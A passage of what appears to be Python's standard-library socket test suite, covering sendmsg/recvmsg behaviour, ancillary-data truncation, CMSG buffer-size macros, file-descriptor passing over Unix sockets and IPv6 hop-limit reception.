self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
with self.assertRaises(socket.timeout):
while True:
self.sendmsgToServer([b"a"*512])
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
# FreeBSD < 8 doesn't always set the MSG_TRUNC flag when a truncated
# datagram is received (issue #13001).
@support.requires_freebsd_version(8)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
@support.requires_freebsd_version(8)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
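# In practice these macros size the ancillary-data buffer passed to
# recvmsg()/recvmsg_into().  For instance, SCMRightsTest below uses
# socket.CMSG_SPACE(4 * SIZEOF_INT) to reserve room for a control message
# carrying four file descriptors, and socket.CMSG_LEN(SIZEOF_INT) for
# exactly one (possibly without space for trailing padding).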
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
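# For reference, the raw SCM_RIGHTS exchange that createAndSendFDs() and
# checkRecvmsgFDs() below wrap looks roughly like this (a sketch, not run
# by the tests):
#
#     sock.sendmsg([MSG],
#                  [(socket.SOL_SOCKET, socket.SCM_RIGHTS,
#                    array.array("i", [fd]))])
#
#     msg, ancdata, flags, addr = sock.recvmsg(len(MSG),
#                                              socket.CMSG_SPACE(SIZEOF_INT))
#     level, type, data = ancdata[0]   # SOL_SOCKET, SCM_RIGHTS, packed ints
#     fds = array.array("i")
#     fds.frombytes(data)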
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
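# For reference, the underlying exchange exercised by the tests below is
# roughly (a sketch, not run directly):
#
#     # receiver: ask the kernel to deliver the hop limit as ancillary data
#     sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_RECVHOPLIMIT, 1)
#     msg, ancdata, flags, addr = sock.recvmsg(len(MSG),
#                                              socket.CMSG_SPACE(SIZEOF_INT))
#     # ancdata[0] is (socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT, 4-byte int)
#
#     # sender: set the hop limit on an outgoing packet
#     sock.sendmsg([MSG],
#                  [(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
#                    array.array("i", [hop_limit]))])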
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
